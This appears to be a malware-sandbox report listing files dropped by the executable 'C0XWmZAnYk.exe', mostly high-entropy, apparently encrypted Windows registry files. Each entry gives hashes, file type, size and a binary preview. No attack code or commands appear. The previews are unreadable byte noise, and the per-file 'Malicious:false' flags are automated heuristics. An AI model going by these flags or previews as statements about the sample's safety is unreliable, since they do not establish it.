              Preview:......K7.d.Q..!....I..m.T....VM.. ...8wP....c.9O......KE..-..~..?...Jz.....T%.....A...w}l....!A7......h.....\.@.a.I.c@g..P-...e'....w2g.Ow.z.5x.......r..+...2c&z.........6...........LQ.....g.....I.g>.X.........(...E...[....E..F&.2.....4..I......).H...B.....'G||...%..i.\.3.....}.V..@.w."n....9...U.e....#.Y.0...@..-.~.\O.XC...T.......dc..5)v.....J.Q.+.T.h,HL...'.|.....sQg..}.|.L....A..>.Ad%....xo.....#Y#.rk.%7.....r.........%........)..N.8..l*I....w.:@.....]Y.PL.....$\.A.%.$N_>.eP.K&.q@z.i}k...E.4=..z.Q.?r5...;.Y.(V..xy.%......0..-.Yw...A.hE..F(A..o..=..q....jq...~..Z....8.....O>,e..6.5?.(.9...}.C.O^...B.....&...6}Z<9..03e.}.^.W.7...g.G....0.y..J...]j.9Ne%...T@...i...m.....8..cvZO.1hv..Y..4..L3LW`[......*..~F...=M.j....F.J..I_+B..NZ9e.1...iYP.V,..t........../.......y..3...uxZ..(n....j.........B..dt..e...].S..?....v+H.A..+...T,.&..Y.....{.v...V.$....0..u....I.|},..L.Z._^C.}.....].Z..G..U..-......Km.L...x...'iy.Ra..E..1){...m)VR...y.....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):6.1980329090668445
              Encrypted:false
              SSDEEP:6144:XiUsW2UenQP3WYnynLRPxMxc0+qFJaohDNdrjBmTu47OYPRUVRnqdKgaFt:pgxOonN5etYRw7bFt
              MD5:95518C0A7C5D4F2FF2DAEFA800113558
              SHA1:D2A9B3036D44CB88D676061BA36A59CBF4660161
              SHA-256:4218694E69F6F240E8FD602891DFA0A32184817FD4FFB7BDCCAAE31493D319B2
              SHA-512:7A2090376D35321D4F7300160F15F8FFDC61445AC110AEA2A58249C9C4C72212F7767EC0A829922832DBF2909D28B7AAAAE985E6ABF11B128515A2D420B883BD
              Malicious:false
              Preview:.!...B....s. .......xQ....;...K...}Q.....8=....)2gK...-|.`c2.z.&...0?......$1.&NQ...H...K...L.*..T#.g&.w...J...H.9Q..1=9z..JDC.....A...k._....9aw.|...=......h..mv...A.q.Tf/..]!....J.]...B"A.u...3.<..a..l[C...}..Z.F.s@.0.7y.H../.,c.....Q.?...%rA$..yK.`.....*.......z...d}....Y.`......j...F.../.\.'{.-4u.[P.%..cDs.|`...r.#.-...8f.2(./..k....ppM{...j`...K.4SB.4..HG_....9.0.>XC....c..G.-.E#tX......)...L..a..()^.....h.%.._....%S......N.....=W.Z...qw..&..1Q.I........o.%..._y...[&.1.U......$.L..)...o..>...o....,....v.._W.*c.2_.....#Nl.....h...c..1.:..}..Q.... ..ZI."e].HCT..c.A.d...fd.......`.....\...v.>....D...tP..J.K.w...g..>b...J......q..c.3..B...&n^.&...3.....].A..D5..G\....s....yz5?...f..N...o.D....-e.o^LH.2d.P.8h..1...D.k.q.)p9.d..m3..-$...4..(#1......L...`>..5..2].a.f.<5V.t_.+>.`.2..;7..)^..v...].....=...B.$`.......w..P.....p.@....?.L'!....^...Y.r........&m..Q..1..0.EYw.0-.9....%.Q.....7..*.{..E.Zi.`2.j..@~c..Y...$..G......|.......sy..U.....B
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979537753618869
              Encrypted:false
              SSDEEP:192:fW8b2sjR7fV66QMlwl3yoSzhiyfVDXkCj35Rh+CNE2Tp:fBHRDV673shiyfVPj35RoWTp
              MD5:F038163509AF59A622416581300BA289
              SHA1:5A86D269ACE2A67CA5DCB4322427B0A787B9BA57
              SHA-256:9A8ABAE94958883515AD0D4E5AE2DF24E5A54DD3F00AFAD2D99E3261007D31CD
              SHA-512:724098C2B45F9265D0526627535EE4184A4F3DCDC5D7121905517918B9C831AA9EEA4E5FF27C929C889A665A8766E3F8523942B8B00BC67727F0D01A9C15FE13
              Malicious:false
              Preview:regf._..|.v..6...*.v...a.D3<u......8.b....c.i.Q\0,oTW../D..|.K0...v.......0....|..4..H.a..P8...I..n.s.>d...^...E.....:.C..>.40 8......=..9...x.@8z..J..~.>.1..=.)...`....<xz..(&.......Q.....}.D}.....l[........K...o.@.\.....LRi.S....O1.d.....9...`.u5.K..U}.`......'..C.....+c.S.(.G.......Zt.i.8..Z.,=%X~OX.r......".^1z.A.....[.....R. \"P'<B.7g....~$....i.G.3....4...'..........o.....WE(./+.}...A..../.b..8WH$........)M....n<$.N...Q....'..v(.Y....#/.s}..Pr7.";X..,....V.pt..........^JY.%.....}[x..3..u.,..S$.5.O|....Z.vW...BX...d.Z..`..~..........0.Pp.-.;s..'3...s..4...._...^...4G..g...EI. .;9..)c..L%w.5.....F{w....rVp./*h.U./.*.\..I..6.Q.`a..w.......V_b...|...G.6*...i[..,S.|.m%...DaC.D...h.E.'J..L...z|Y_E(nI.e.:5..T..`....g...m..9.....'M.<...%.u.......0GoI....jq9..rZ..@...'.~......^w.....rd.;....|......[.fw.Gc...Y.)=<fk.2.vcR.4C..k..1hx.d......i.xq.......5.r......"_l......>U+(S...E8k....qe....g.i.9..PpM.@.Cf.;.. ,....e.l......(..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.974677325622133
              Encrypted:false
              SSDEEP:192:qScJngWMTdbBidShDeQeMHi4pIbDHZ1L2l1c0Ni5c9VfW:JW2dbIdkri4pIbD5B2/SgfW
              MD5:EBBAF98C22911CA782DE09A615AFAD25
              SHA1:587A88D6F755D509E5471CE957E3362EAFC25284
              SHA-256:77FFE3723C1AD17C2E2DF559E0AE9AEE6585186EA20915B3A4BEF40FAB5FEAF6
              SHA-512:08ECF11E3B79BC5A030E55329BCDECEC60A951326D09FD5DB3195186E55ECD8FAEC430459A53532D714C23C69F104669B1F25BE27B54CD907E72C44EDD3C1BDC
              Malicious:false
              Preview:regf....n.F.........`..-d......\...I....VC#CS.a>.D.}.....)uj=.#SsYf....~......&../.S....B..7...V..~}z.vY}..;.?...../V.$.K..'...DE..4U.3:..x...A.Y......^ 2.(C.K.2..ya.o...|...r.G..h..m...O...6v......B(^c...D..m..<;.~J.0..=E.<..dr6X.hrp.^.....pm...y}.9...d.K.;x|...g#...I.7>.HB.t.@J..Y..f..l.0.s......=Ch.....%pi...f.3.0....t..h.-..{.....hQ.-...!c.._...=.)8..+8U..b..n......0..7...E../a........Y|e>`.c..J.;V..YQO.L}....kE.._L..U.....D..p..#5.F._...*..E..1.~..x..JTsC...W...9.Sk.pI.Z.....g8...x..V..(.,......G..P~..?.....T....7+....T.....IBN.|.Z{.M,L.H.G/p....9.......(.`..:k.S.._..s....<....5_...`...<3......~........AF..LV.*...*..;.!.*.>D...y..Gu.s..`.8....%.(.y.d...kbA.....=So.<.1.v.....C.&H....~..............d..._...~..^.."...6B.NtyVO{....../.WM..a?.Yp.#...(&...Q..FW...+....Iyj)........ B...J./..n^......].V..a$d9.Q.....z..@e..P!S.....3.)....B..%...Ti....4*.R..K/A...y..<I.2.r.hz.C.s.H.y....&t.....b8....H..?.x........8oV...U~...f^.......z.JO..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979721951516337
              Encrypted:false
              SSDEEP:192:K/Ig1qlzfKuXwtKHJbUkdWgFEINy8NKne/PhyVM5vHG:K/9qxCuXDpbRdPjNnNKeUVM5e
              MD5:84ACD5E3139179ECBF3D6ED925888C38
              SHA1:903B4F87C398EA9D364263F32C74775529D2F040
              SHA-256:3755B0F492F69269422595FBA5355229B8285758D3F60A83A6FF342AD41BA3FC
              SHA-512:06203C416620B4E897EC9B159FF969C15A90B74E2DB17D7FD613D45CDB4CBA2E9BAA68277DC150553EB867F60F48B1EB709C8FA9E8C547CF619B0DD74930D0C2
              Malicious:false
              Preview:regf...i7.&./..c......Z..hW...m.....s..+.....z.Y.+~!yc..'......7.k.l.S.,........N*(l.dCAw.U..z.T.BJ..s....n..'|.......dutx%i.....]..T.3..ao.........c.....gF......W.Ab$.+^..4.T..._...A.(.O.R..Y.?zp$i.@.#o.9.1sq.v.-.|E..QN...*Oj...ql...S........a.yuy......2....[.s........E......I...H......#.t_......<..7..xFvUH.K..v.......^..n,Kt.?m.Z.(L....v?....$..<.c.#.k.._j..........u~...[....&%..{.....%.|o.....5..1.C.o....\........R.7..Y..^XWL.T{....o..AM...s^5...b7..P............w...'.Y........X...T.....(ay......T.......\...QE._......U5..l......*...s...G........6O...G...v.......5.....$.+.dFy.IR...w...t.....c..3um...I0.MY.@.n~....N.@..$..%.up.$Z.T;.%..U$.3..6B{.....(..RF...v0.....Dq..^[A.zM........z.'..r>h.AsJ2W4....x.(....%T..@c.d9..~.=.{L...v2\h.[.h...p....|...4..6..+...sTK..a.z.L.&..."....N..@F.D..#*...J.A[m..u...M#....?..I.mxl.]v...lG....?..S..3.MvR...R.x.....S.G\#$.....\..j. .M..L..s...Z.#1...h%.e.s.k]...7...a.G.=An.S.CgN..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.97563028180368
              Encrypted:false
              SSDEEP:192:ld3Yt7Cba0KvhY/xeX4wdkPdWW6dBLX1MfQeE7gdTfOXLP6Obvr6LGq7mG:lA0Kwi4wdSN6dBhjewkfM/vmLfmG
              MD5:BBCAFDA99DE247CA54CDAA1EF55366E7
              SHA1:A0AA6AACA04DA33CB1FDD87A2AD9D7B0DC1206F0
              SHA-256:7E465C133427C36035518A0E4B6EA34CB820EAFBDCDE2B4614BCAF2560BA77BE
              SHA-512:67C5BA43BE841F08EF519C41C1EE6EE9765AACBA31F52575734F47DF0DEEEE14A16E2993A7FFA3BCC9A68454D192B556E8E08C3BD800EFDB544B99581EB36CA6
              Malicious:false
              Preview:regf...4N......W3..<..\....i.....90DNy2.._.......\...8.4........p.O.z..N<g.+.D...W...A.......G...Fk.1..3.@.L!..(...oD.:...\|.dke .O.. ...<.3*.r.nk.....,...T`!5p........gK.F..>v..U.<.5s.....y....k..M-uoJ...\do.^x.c%X[..!.V...<m..fw#]qq.3=.....!.....V...p:9...J.n0.`..-.....i..|kU...b.w....<z.g=...0vx..5..e.g_. d..Pu..z.C.2...xB..z....}...<.*.3....V....5..M..BP.+.5(.w...<k.(....y%.n....{ms..W....T....h...0..A.....%..T.G....U.&....D..N.....V.H.....|..O7a.@3............(B.......N..B.%@.r.....u....w{/J....G..}{..p.y.......V&~.l..U:...Q...uk...\........&.......v.._...D..C.o...!.O.u...Y...8..E2c@...Q....R....%x.a.._...i)..I..UP.M.....'ih../.....IS..E.j.W.k.........a....m....b.=n..N..Re.Z.d...B.,..{..K.0h../F...<.M.+[.e...G ..Ky.o.;...>......Z....>..bOFAsL-,9..,7%.W.p.........|.G...Z.V.F,.+...<..-.M!R..k.....Y...5.n:.Rn.... ..8..o.....i.........*e.......4.*$S...s..F.1.P.?J.P....q.^.o./.4.`w.&...U.....+..*...N...X.`..@.n.&*.c:1.?.)b.M..VXm.JB..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.97593053450736
              Encrypted:false
              SSDEEP:192:9/2OYFgnwUiKG9GzGx8cJXbjDAFHoUP4kZH0TqD5LcFBaTUWrzeB4r8IjDivN:g7F+wjKGYi7bXCIUQkZHD5EBaNiurVi1
              MD5:0111DF8F2000631191592852E56D3AF4
              SHA1:C754E069EA5B31569BD3B144B127423690FD802C
              SHA-256:635AF84657998C4B3F0114531E0232FF2430609D72F7792F79D946777C156996
              SHA-512:C27BAB0538F136E0F2CC70402CEE45EE3D919BA64A955A0F1B554BBA9DA11987760DC3FAC3D722EA16563EE09D600C02AD5EDD4ADC3CEFCD4A30523B087BB881
              Malicious:false
              Preview:regf....D.g..mP..a...^Lh..o..J.Q.E.u+...m-..%.....Y...V.....i.%.(~.K..LD...)..4...=.*...9}...t.2.n.....e...h>lA...7W....Rn/...vn..8..x...5..Y.V.*.D..!E....tx6<.f..|..L...1'.*......2..Z...|@.I..PP..<....sy..[......*H...(.|w.I..x....ER.*.\527........p..G'....g.?...Q....UFYW.L8.i.B.KFf...H...P.}..Y.b..................dxZ.-..B.4.;...r...Z$zn..L..Y..%.........B..%..Y...M.E/ T[:...*.H.\..V8..4<.i...^..W.J.;a.....9.C/M..`8OEz%+.t.Dl...,.W.Y...%^..W,f...........0..q.ox.'y.C...^&.8..l..4.'...M..C.Z..r.Z._o..i......B...r.g....L..3z.D.v&!w...m..\.W..>.(C......."z2.I.....].e..3..d...m....R.Z.......Ic.........[4...o..G.dm.V.P..B.7...S....kqQ...}w..h.bv....C...(k..1.....M....1.yq%;.KN..1...@......Uv....1..,......k.......{^g..tr..M....%..NV..!..S.1v...h..2..yt0j.v...Mz.L}..k."...g..l...P).Y.tVgz.D..f..,.G.).b....F..7.k..$/.....>_.:z.....M......~..I..%./.?...a...&....t.......g{...n..Q.. SC_......U.3.X.<..........i.x...k...*...&\ %.'.qu.?-X..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979749922799187
              Encrypted:false
              SSDEEP:192:PR58yfGcRjTtTxRugFgabprMbkB5XLrh7DOs+F5vSLH:PR58yucRlVRu8wADrh7s3SLH
              MD5:D04D4E202FBBBD708DAF1E609D5F7E57
              SHA1:33FA8CB8BA511706D6BC8B0125F2364F6E6804A6
              SHA-256:8DF2146FCA8FE16DEB5CD510763654834A9DF6C5908C81E3380957E667988977
              SHA-512:1B0BDBE0980A1E8F5A391B094F170B8E6A5A263229BFBC18374BEC380E6B17D6FB3431859F3AFC13FD154B3207041B2AD5514C549A33498803AE212E9E5CDFA1
              Malicious:false
              Preview:regf..BM$.i..(.LR...~.#:d...UQ......}.N....gxg...~.p...T.......j...N.EK.I.q.....V...J=..:.07.*........Wv..........b..L..j0X..`.*....>,-..S........'..n.....8.0...laf......M....O.....a..4..j...q..r....Y......uA.$.F".....9...1....cvG...[.a.05.p.@....a.L.E.?....-...E.m[..im.L.|..F...\..N....8. ."}.5a.......d.`..k.L3...y."o.2i.eR0........<........a....X.MvVh3:F.2 i..L>q<M...!.JF.,...t.].$.`~.........._...o..V...E.z....|..qoT...G.$v.$u.].c.].I.?....F.._.z.s.VI).k,.b.og%_t.$;.xln3.[..%[...2.2.D..wm0....J......C|8q..S...).).B.z^.a(..`z.0.....s.P.VC...6..$b9.D..!P..7./..EP..fa.Z.I......?....j,..)..d..D...O...z.a.+..../.w...hq.K..F.A................E....>.O........Z.../.....*.#..z. $.......g..U.B...5.R..W_...U.*.&...w..gM.Zd.......]M.W...I.29H.r........_tA)>.....j.7].0G....f.l"..G..Q.a..u.0.d.X........UI..R.......o.....y$.;q/_.V.j..Pm.>.....M&...>.o.1.......\.......19JT.0....U?..'B......(S/..$.a...`...i....+cc.T.[.....f..x9......Z...-..2..*.A..r.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.978583391869657
              Encrypted:false
              SSDEEP:192:Z/ipUVIjmKY1s38q70E1N4x04QEbRJId/bu5rDp3/Lm15L2Mpz1immI/2XdH:ZtVIje1s3X0M2xvQEbTIda5HVLm/L3pM
              MD5:6579E2CC707C9E11EE1DD0BAEF09D6B9
              SHA1:20B99F5DB69259F006456CE9A40F8926E5E5443A
              SHA-256:83B55928C6AD84A89571EB05233D7D2084D3ED3EA995C123961A80E7B68AF8F5
              SHA-512:D5042878139BFAADDFE3299A8E7D889E6B009DD766E9768F75D702603CBCD1C9FE59FB18AFC579D34DB9BEDE44CD5BB509F891912DE7743B9A0F40DBF0BFE52E
              Malicious:false
              Preview:regf.......~..X.a.8.....@.j-~....=G......y|h.P..8..M.XX....*".X..za4W..x...w.l...c.......,.Fe.M......D.. .."..CR.....J{...dt.y....6..n.9...;.pC.sS.g.d..3.v...D...4.....n..z...!.....q.aS..Y.&|..h......S]......c.fQ.3SE.....3.ll%....H5......\.M..D~)..8$/.<Y\...3V}.....T8@.l.~..;..B0.x"W5....I.....f&$....o.}.7...@...$%......;.\.F.E.n't.....l[+......r.t.....O.~...&8.......m1..N.%.=$......._......qjq+.....F$1b5...C_P..rjU..ji..QV..h..,.._%....OO.....ODw.....u....)..?.f..;.5.4.k).{.y...F...k)..Q...U.......y...jd.$8).v...?..#.b|.4.E.#.q....SBRT.....`h]#..]..a.0..Y.d.I.S.j..-W.....s`...6.TN8..)....<....ji..W4..=n.S.....^<.bz...U.s=.dB.G..=..G..pH.....l...-...$.1.80..!..+.4_".....4.@..3S;...<.4f'>r...Vp.v.o.0.E.......Jf..=....(&fJ<<..C......2....1. wN.k.S....)....O..j...C<3.S<...&J..q..(..z.].Py..Vm#.k.1....``d..+....A,..'B_..j....=..GQC.2.}v.`...\.5u'=.F......e.d#C...X..(6!...EyC..6.R.}V.0..h.d.~KE.u.L...../...%.....+H'j...P. ^q.o.'.F8*1..(
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.975780702467655
              Encrypted:false
              SSDEEP:192:NlroiO6PXMMp63PQOICbLOrAUNmv4OKkehx5pYCqUZ0fk9VVmAeBoDkeMhb:bcdKX7p6fQOLL2PNmv4OKke1p70xBoDC
              MD5:67F039680140CA4C931DEDB4B1A196B1
              SHA1:A449AAD7F1DC8D65406EC2030A45F686C142F00C
              SHA-256:7F8F4D3739594665C0293F73CBDAF87873A3384628F60B77983FE4822E0DEB02
              SHA-512:0C546A44AABE1375E15C56D3FEDBAC40FE028D6B68742BBB369FCCA51C97F37924102E8C7756AD3576DDA5B389B7ECE0FA94557D6DC031CE5DCE6D1A2E994DA9
              Malicious:false
              Preview:regf.........,v.I3...!^......?...g5.E......8......]M.XTy)4.jx.C%....>.W.V>qT..9(..z...I..k$..h1."7.......d.{.&v........E....x.*.z..YsR..B^.{...g........2.H:X%......kg.. ..C.8..wR........=.'...b.#.L..x$d_......,......L..k.pq.^.K..W....9...fg]a..,IxW..C..L.xb,;...L...xG)P.:y..-...-..<... G.?.IZ.8.../......*&..T./...a...v;..%...c...b...M.X....|X....G9...)....hZ.....r.nS.;.k?.8.h.DTV.1.6r....>.........c$.F...P..UOP!..,#./a....._.6..?.~.|..}....mr.e....4..e.<...3......1....iH).b.J.m.[m._...S..nE..>.@....K,.Zh....,..m$W..wT...E".V.Q..r>.Z.".$...:.^.#L;.E7!...@uH]..Nk..U.....U@. .fI.e..I.......<.`4..b...}.c...1Q.2.8T.8..\..W...!"...%..D1..f.4/"..;0J.L5&R7....)..{a...N.r...}.c...T..N.V..V.....K..K.N..O.....*...W..t[..t^~.p...p1...#....4Tz..<...........y_.;..raL@J....X.%.......b.T.&D...$...|........0..X).u.`........c.Z.;...[.y....^`.&..n&.})....j.Hqo$.qb.(N......!.m....7.<.`;.....g...h.....[...`...?f..(.n.?.G=. !.Ha.2..t}...^.^.B...l..L$bi...M.>2.OjK!..I..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.981393643081816
              Encrypted:false
              SSDEEP:192:mFIo5ww8EU87ysffBALDHXSYm+cxLqZ167/PNGYB1Ba74BZwb:mFIoE/Oys3RYlcxLO67IYTBgYa
              MD5:5B6588C7CFA36CB805DCDF79C738B828
              SHA1:98A611F823376A37182E238A3EC6B26F56791FCC
              SHA-256:233F5766D81B893607E60244421FA4C6EF6F77712FE23C179C12D501341BD3F0
              SHA-512:D582892FB800E5C63DF0356402BBFBA2CB7F9448A9D2A8B8F7AC927E5073935DACED2703848AB2640C8ADB71BE781373E69E431295A0CE551EDE4A33AB54280F
              Malicious:false
              Preview:regf......4...C;Z;#.*..+.A...L....{'..=99k.2.R."..S.Pc+P.!}....c.q..."..JZ...m.Q...r0.%+f.jy4...{..A.I.h.....W.-.b.DVw....T...8..\.rL$.G.)..r..........f...<...yl...+. f.L.X[..H..<.u..) ..0Wy+=%m=........$..../."<.U...j.F..28h.2H....3..}_..v..b....5N....1..?IP.}4...;.q#d.g...G..z.`..\.mb...7w.....W..z.>..8.5.js.F.C@.s.. .;p..D|.1...q$#f#.n..I.N. ..'...\k...>......M.....c.A..A..{.....#....2.^y....U.*...m.9.Z.....8.kppibj..........8w...L...~.]..oleSM.E....z.K...Dz.......+...Lv^"Z.....2....y...c.P..........8P.X...s....|.. ..RV!..c..U...@...{.2/Y..@.M......%~.h..p".y>..U.Z4.S.....a(...(..h....{o"....X\ ...-K..A...!p..gV.......@JU.NH..8...EV.K..H.jE..}...$m.....9qty....y.vk7.....:..:#F.%j..... ....H....~...[g........6S$F...L9.Ml....Y....)g-...16.:.BA.>&$[.18].p.......D.......l.}..TK._kvF`.o.zf.0H..,.....#f3.[.3..L9....UD.6.Dm2hc.{...o.......4...$|"J.M.d..Z.V.`~....<..1...|B.W..8g.Q.uO.q.j.V{...ts.W...dD&..C.AU.p...&....u.^..P3.../%f.5Y....o..{*..h
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.978984212732948
              Encrypted:false
              SSDEEP:192:RZkd51yZe1INcRE/VyXrfitqLFiqrpdpqzH6PUdTDIKbf:RZGN1EI7isXHpwaPYTDrT
              MD5:1D28B316970B63A4A6E5C80B08250903
              SHA1:B1A7A72BF73F3CBF683274355C052B4EA71D9B9A
              SHA-256:E1BD937F304351BB2636662CF0D10ABA2CC1E407D8231B4AC717F18381723B0C
              SHA-512:842B0DA1BFA253F548957FFDBB79F6DD5D24F445C867A966D83A9ED56E32D1B83425001DC407FCA96EEABC95454A11248D969A5494499C0BB0CC90CC9FF7852B
              Malicious:false
              Preview:regf.Sa......j}I..."...p.m...aR7p.......N#....9YuJ.5.'.....u....8..3.......,.......Q|.`..Jb._.D..m....N..R3.y6E2...SUF..1]....$f.z.U....!08....<...J.....~.z^*D"p....._..;`a7h..F.....|....`C`...|.&.`..G.E).......Q......`s..U.w$O.6.."..H..'..+... .>.]...{.dQ.cx.;.]../z*uj;B..L..B.Cp ..IK=..iW....J.R......`m.....\..].#[...q.S.?....1....Z.....7....elX.2...x..h.%..;.4.v._,..]...gF.M..b.....$e....>Q..Ir..~..ud..`..Y.wu-..o_.!4.b.1.....s.H.!..A.e.....@.n.....6.P.s.Q..#.o..D&.?..!...44..|.&_...Y.5'#..C......=....'.....!...1..T3........O57..[.~U)-.....Zz..a`......C.Q.\..8...~.D..3...u.k?.DT....+N..l....?AZ........^..W.....A..gE..T.7I.GUB..G@.O.. ..k...G@.2.+i..h...P`G.R..&.r.#..;r....2..M.k......S....."..He7s`......$..^.-... t..b...*7.RN.a..#.....8g...._>.z.]y..."I..H"kW....../...dYu_..&......?34...9.D.Q..T]..*.(...+/e..........|.....,R..k.n.QJ.*#.[.......F.1.....'..>.y!..^a.3..^7$.........n.pZ8.s.=..N....;.....6s..F.e..n.]..........P...7...%....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979073204907418
              Encrypted:false
              SSDEEP:192:vg0CS3Cl30g/WFiYiNmXjjw5/UD84drmX2dZ2qMidM0P:vg0CS3dg/WFFjs5/UD8IadeJP
              MD5:63BD8E787398B8958CED6B79C4913D98
              SHA1:C517B19286C949755B6B1B83C5A454CE2EC15286
              SHA-256:68FED2B004BBEC299798C2A0037DACDEE66E5529D0243B4864132EC9FB193143
              SHA-512:5172A385B2D367A62D3627A1570A0170678D1ED4E61377506CA8E3267709D21ADC3CB41B3C8360E0D7B7E2BC53451B3E2977BDFAD7A6F8EB901C74CA6C4B114C
              Malicious:false
              Preview:regf.d|._.U.\...;\I..D .fB..cO.@9a._.V..,..e..1?..<......$......Z]R..C.A..[}>c.I.H.......@%......yR]j.e..1.y.1r...gq..:.b....:...![.m.jY..n-U.I7P.qZ..qd...Z^iG..0.......-....n.<.I(......\Az=.n....c....U...7.dl...M..o....'.Mj.lq..mtd......P,.ve....G...%S.K.....I0.9.8.....d...PIhO....1..e..J.<1.4@......w9 ...i...d...d..b.....9&!..~-m.....z.............o1......I...g.o.%4..ypCb..[.#`.E9o[`...|...2.t.;..n....(..8.+.d.c.s..C.;...........b.jf"m./.>`w...{T:)..^.e .`......\.[w....K+.PA.._X...!..g.....;...L7,...e..:........,....E.6...:h.t.x.......as.T.M..yE5....?.(...C.2U..z...=..r.$......[._.....{b....y...r.,.[z.....]......g..X!.p'.D.AA......Q>r...;H.D....t3..t...n.u.+......P..Y.*g.....8x...\............K...&......5e.D..`|.$2B[.....Z.'f.k.33..R-....cUB.,.B....XJ.:.....(kd'?......7....V..,...z.d.....".......6|...:..N.....J.N/.M.3|L.C..Ww@.. .N.l...^.....].a...k..m..-..;%xf..W.....P.H...9g...6N.....t.O.H9&.".....<..J.C.....k..5....,..e..9.E...d
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979645104933804
              Encrypted:false
              SSDEEP:192:UlDwJ2QpnrUsnobtmmaIMgoq1ekQUw7aD6dHzRXItCsazGIf:UwcE9nobtkILNQUw+DcHJ4lazXf
              MD5:3C81E1C78DC08DA7F55BDA5C0C8E0905
              SHA1:55B36ADF62FAC8C359E0C7B55AF0973EF320B7D7
              SHA-256:749222F8847B3D2A87B3AA965F537CCD2519DEE8C238A256766B6A683F594FE9
              SHA-512:2052D3FD00A9836B24A7E898CD8CC984174A7F31679630270CBF103E0DDA4EB300945B0F4E5D4E232DA9E5ED6B1C5EE167EBE369F377356CBBAFC335F1D89CEA
              Malicious:false
              Preview:regf...G.5-...\..t..s....b.:.w...9.+..v...(....%..rZ.K...B.(.0V". .;....=.lK.4..Os...f;...}...:.....Wt...~..KV..C.K...P...l._...;y..B[..B3.=..2a.'.>..b....v..MI...R.US.....{.g6...^...y..Ni...`.......%:...ov.....j*@..M.Jt.;.....|.@$|&d....D...|..$+T..H.<hT..l..\.s..T.....5H#XRz.W..jI.q...wi..2.=.g...>.f.w.1.I.\.........:.K...d.C..QV.t.<.<.....Y./.l%..DD...3.5.C..;.VD*R''.uGF4.<z....0am.....E....D8-4..9yA{.3sL.Q...-v...>jk.u...>....d.S.f....Y........V.)...%...21.p.F.]P..l5.E....O|nr...x.......S.......'R3b....N.\k0vr.c.b..p...;.1.....{..*...)...sp[D..}......y.s=...6.g.lQ$.h,...7......9....gU......"M.V.6~.....I......{T....{.~M.E...G..3.MZ.8....1..G..R0....e.).'i ..`..'=.X......x<...shI<..hi......$..{M1.....5..EuA.d/.f.'cl.iT....|...W.M...F .^.W.D...!.').....0...dV.0.=.2............$..t.!. .i.d....(.....X......g...:.K.z..\*~....d.+.r.....,...fe...E>...8..~u.O.[..,.v......%..c.j.....Fh.....>.]..._....;o.Z...7..r< ..T..mk....W.,.!9.. ...l.j,*0..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.9809748730817835
              Encrypted:false
              SSDEEP:192:wwPsWyOhxJ+XTjjCV224P9dI/W4H5dXFnTElUPShq:X7yUeT3CYZd8rd1nTElUD
              MD5:F32FB016365C45F3FC0D9248AFCCA395
              SHA1:1EAA5FAD4AEAD2A4D5A05789E1BE0B1755D81DDA
              SHA-256:F6BC4FD24BB19BDD2EA23D7BEC37BC170DE067581A0DE62A363558855C534424
              SHA-512:5B16FCCFB181434C5B9D1560710CC0413CB143AAD9D9A5C0D6327C94EA5DAC679A643145B66F5EC956E1FAF8E3CF6A2471100C9A41A4949B675CF6A2BDAC205B
              Malicious:false
              Preview:regf.1..*YC/..6>."s.59....A...D.^...&].+.....p.......@....f..M....Tre+X...\...0mC!.`.....(g,......_v^%......E.11..D+...@.W....*...|.Nv..L..]T.<..."-.2.8.ex.X...&.>......`c.gw.n...5+M8.B.?.'.fA.,d....Y./.4w..d.....Q.g.....g..)..@..n.A...TY..8.g..?..}i......}.......B6m..S..b,.{...V..I...).;.kF ..Hd...~...*.g..... a..1.X..Qp.$|\.....oyG...O..`C.d,z9M.V)...r.;.../......... _....Q..].M......x.j..(....V.....~.Q..C..X.....u.=of...O..6.....U..t...M.Z.r.g..kC...f-j.Kj......Yz.$.s..r}...^.[@t.4.z0Sz.R.......D....@...(SJ.}...=..]8Y....GN0...M....Bew^T..?.8.u...+h.w.U.b...l....h...|.E..X.u.E...s..f\.....o....p.?....zP..W5..Ks..0.(N{....v[b..to[j.G....[.\h...j...rh.sAGS.#.Y.S...u..x..n..p.+h..Mp.... .=]..q*.1v.....v.|W{.F.~=.e..[........(4?L..m...&...j.V..../I..s.w.....i,S....(..M.....K.W......jw.t...;.........r...._99....".:-..k@.._....eT.v.W...../.u.w.0...K.......:.O.F.<WbN[A..R.#.........n.f..p.;S.d.T.ZYA..Yvz......y.......f.!.t..P.{.n.fYW,V7..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
